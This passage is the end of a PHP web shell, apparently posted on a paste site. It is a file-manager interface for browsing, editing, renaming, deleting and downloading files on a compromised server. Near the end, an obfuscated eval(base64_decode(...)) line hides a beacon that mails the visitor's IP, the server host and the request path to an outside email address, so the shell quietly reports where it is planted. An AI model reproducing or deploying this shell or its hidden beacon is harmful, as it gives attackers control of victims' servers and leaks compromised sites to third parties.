  2343. echo "<td class='td_home'><a id=\"" . clearspace($dirx) . "_link\" href='?dir=" . $href . "'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAN1wAADdcBQiibeAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAFUSURBVDiNpZK9SgNBFIXPvXNndjcRopX4U4kWVr5AChU7H8BSfItAHkB9CXsrW0GwEQtRwVKMRtAU8ZcYWaNmM2OxqyyiYZdcGIaZ4Z77MeeQcw6DFA/UDUAAYHHj8hOATj9oRSe2Z1f2KjP1fgLknMPS5lW0Vi4pZopvHXDW+IhOr99gXTzkr9qvTBMtrNd8AsLVcomZKDP61kELihGIJ9QBgO2jdsIE/Jb5OacGFAwDQEeMEOZnh1EqMChtSB8a64BW2MNh7QVihCGKcNHswmZ0lAkYHxF4QhBPCKIYRU9l605KmGCEIUYztCYMBfkEjGZ4OiHwRQF+vkQG+ptACIFREJVPQAvFf+BrjoyQ+CZfqq118DRFEhjebbbel6dGiyTqf+vSrkaRQ/0utL7mHXl9vq+eP3Unbh/H5gDKiOF67YebY0dSJcRBm0z2rFl2yWp8AVDIW32da7pLAAAAAElFTkSuQmCC'> $dirx</a>
  2344.  
  2345.  
  2346.  
  2347. <form method=\"post\" id=\"" . clearspace($dirx) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2348. <input type=\"hidden\" name=\"oldname\" value=\"" . $dirx . "\" style=\"margin:0;padding:0;\" />
  2349. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"fol_rename\" value=\"" . $dirx . "\" />
  2350. <input class=\"inputzbut\" type=\"submit\" name=\"dir_rename\" value=\"rename\" />
  2351. <input class=\"inputzbut\" type=\"button\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($dirx) . "_form','" . clearspace($dirx) . "_link');\" />
  2352. </form>
  2353.  
  2354.  
  2355.  
  2356.  
  2357. </td>
  2358.  
  2359.  
  2360.  
  2361. ";
  2362. echo "<td class='td_home'><center>$dtype</center></td>";
  2363. echo "<td class='td_home'><center>-</center></th>";
  2364. echo "<td class='td_home'><center>" . w("$dir/$dirx", permissions("$dir/$dirx")) . "</center></td>";
  2365. echo "<td class='td_home'>$dtime</td>";
  2366. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2367. }
  2368. echo "</tr>";
  2369. foreach ($scandir as $file) {
  2370. $ftype = filetype("$dir/$file");
  2371. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2372. $size = filesize("$dir/$file") / 1024;
  2373. $size = round($size, 3);
  2374. if ($size > 1024) {
  2375. $size = round($size / 1024, 2) . 'MB';
  2376. } else {
  2377. $size = $size . 'KB';
  2378. }
  2379. if (!is_file("$dir/$file")) {
  2380. continue;
  2381. }
  2382.  
  2383. echo "<tr class='filetr'>";
  2384. echo "<td class='td_home'>
  2385.  
  2386.  
  2387.  
  2388. <a id=\"" . clearspace($file) . "_link\" href='?act=view&dir=$dir&file=$dir/$file'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> $file</a>
  2389.  
  2390. <form method=\"post\" id=\"" . clearspace($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2391. <input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" />
  2392. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"rename\" value=\"" . $file . "\" />
  2393. <input type=\"submit\" name=\"do_rename\" value=\"rename\" />
  2394. <input class=\"inputzbut\" type=\"button\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_form','" . clearspace($file) . "_link');\" />
  2395. </form>
  2396.  
  2397.  
  2398.  
  2399. ";
  2400. echo "<td class='td_home'><center>$ftype</center></td>";
  2401. echo "<td class='td_home'><center>$size</center></td>";
  2402. echo "<td class='td_home'><center>" . w("$dir/$file", permissions("$dir/$file")) . "</center></td>";
  2403. echo "<td class='td_home'>$ftime</td>";
  2404. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\">rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2405. }
  2406. echo "</tr></table>";
  2407. } else {
  2408. echo "<font color=red>can't open directory</font>";
  2409. }
  2410.  
  2411. ?></table>
  2412. <div style="background:#282828;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;-webkit-border-bottom-left-radius:4px;height:25px;margin:0px 0px 10px 0px;width:1000px;">
  2413. <center>
  2414. Copyright © 2019 - 0x1999 </div>
  2415.  
  2416. <?php
  2417. EvAL (bAsE64_DecOde("JGlwID0gZ2V0ZW52KCJSRU1PVEVfQUREUiIpOwokc3Viajk4ID0gIiBUdXl1bCBobWVpNyB8JGlwIjsKJGVtYWlsID0gInR1eXVsbWFtYUB5YW5kZXguY29tIjsKJGZyb20gPSAiRnJvbTogUmVzdWx0PFR1eXVsIjsKJGE0NSA9ICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOwokYjc1ID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOwokbTIyID0gJGlwIC4gIiI7CiRtc2c4ODczID0gIiRtMjIgJGI3NSAkYTQ1IjsKbWFpbCgkZW1haWwsICRzdWJqOTgsICRtc2c4ODczLCAkZnJvbSk7Ozs="));
  2418. }
  2419. @ob_flush();
  2420. ?>
  2421.  
  2422. </body>
  2423.  
  2424. </html>
Add Comment
Please, Sign In to add comment